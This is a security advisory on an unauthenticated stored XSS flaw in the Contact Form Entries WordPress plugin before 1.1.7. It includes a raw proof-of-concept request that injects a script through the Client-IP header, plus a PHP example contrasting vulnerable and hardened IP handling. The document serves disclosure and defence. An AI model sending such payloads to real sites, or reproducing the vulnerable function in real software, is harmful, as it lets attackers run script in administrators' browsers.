Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin stores a client IP address with each contact form entry, taking it from request headers such as CLIENT-IP and X-FORWARDED-FOR, which any client can set to an arbitrary value. It does not validate, sanitise or escape that value before storing it and displaying it in the entry view. An unauthenticated attacker can therefore submit a form (the PoC below uses Contact Form 7's REST endpoint, whose submissions this plugin records) with a script payload in one of these headers; the payload is stored with the entry and executes in the browser of a logged-in admin who views it, i.e. stored Cross-Site Scripting.
Proof of Concept
POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1
Accept: application/json, */*;q=0.1
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9885500162977152723644841236
Content-Length: 963
Connection: close
Client-IP: <script>alert(/XSS/)</script>
Cookie: vx_user=61c2ecea43ad6164016458635903967

-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7"

1376
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_version"

5.5.3
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f1376-p1701-o1
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_container_post"

1701
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_posted_data_hash"

3e8ce0f47face5a3318813e733c3c774
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="text-42"

Test
-----------------------------9885500162977152723644841236--
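The PHP below is an added example written for this page, not code from the Contact Form Entries plugin. It models the bug class the description names: an IP address read from attacker-controlled headers, stored raw, and rendered unescaped in the admin's entry view, next to a hardened version that only trusts forwarding headers behind a known proxy, validates the value as an IP, and escapes at output. The header lookup order, the trusted-proxy list and the sample $server array are assumptions for illustration; the plugin's real header handling is not shown on this page.

```php
<?php
// Added example, not the plugin's code. Models the vulnerability class in
// the advisory and a hardened replacement.

// Header lookup order is assumed for illustration; the real plugin's order
// is not shown on the page. CLIENT-IP arrives in $_SERVER as HTTP_CLIENT_IP.
const IP_HEADERS = ['HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'];

// Vulnerable: returns the first non-empty header value untouched, so whatever
// the client put in Client-IP is what gets stored with the entry.
function get_client_ip_vulnerable(array $server): string
{
    foreach (IP_HEADERS as $key) {
        if (!empty($server[$key])) {
            return $server[$key];
        }
    }
    return '';
}

// Hardened: forwarding headers are consulted only when the direct peer
// (REMOTE_ADDR) is a trusted proxy; the first hop in a comma-separated list
// is taken; anything that is not a valid IP literal is rejected.
function get_client_ip_hardened(array $server, array $trusted_proxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if ($remote === '' || filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '';
    }
    if (!in_array($remote, $trusted_proxies, true)) {
        return $remote; // not behind a trusted proxy: headers are attacker data
    }
    foreach (['HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR'] as $key) {
        if (empty($server[$key])) {
            continue;
        }
        // X-Forwarded-For is "client, proxy1, proxy2"; the client is first.
        $candidate = trim(explode(',', $server[$key])[0]);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return $remote; // no usable forwarded value: fall back to the peer
}

// Output-side defence, applied regardless of what was stored. Inside
// WordPress this would be esc_html(); htmlspecialchars is the plain-PHP
// equivalent so the script runs stand-alone.
function render_ip_cell(string $ip): string
{
    return '<td>' . htmlspecialchars($ip, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Constructed request environment carrying the advisory's Client-IP payload.
$server = [
    'REMOTE_ADDR'          => '203.0.113.10',
    'HTTP_CLIENT_IP'       => '<script>alert(/XSS/)</script>',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.7, 203.0.113.10',
];

$raw = get_client_ip_vulnerable($server);
echo "vulnerable stores:        {$raw}\n";
echo "vulnerable renders:       <td>{$raw}</td>\n";

echo "hardened, no proxy:       " . get_client_ip_hardened($server) . "\n";
echo "hardened, trusted proxy:  " . get_client_ip_hardened($server, ['203.0.113.10']) . "\n";
echo "escaped at output:        " . render_ip_cell($raw) . "\n";
```

Run with `php example.php`. The vulnerable path stores and renders the `<script>` payload verbatim, which is what executes in the admin's browser. The hardened path returns 203.0.113.10 when no proxy is trusted (the headers are ignored entirely), and 198.51.100.7 when 203.0.113.10 is a trusted proxy, because the Client-IP value fails validation and the first X-Forwarded-For hop is used instead. Even if a bad value did reach storage, `render_ip_cell` emits `&lt;script&gt;...` rather than markup. Both layers are needed: validation keeps junk out of the database, escaping protects every place the stored value is displayed.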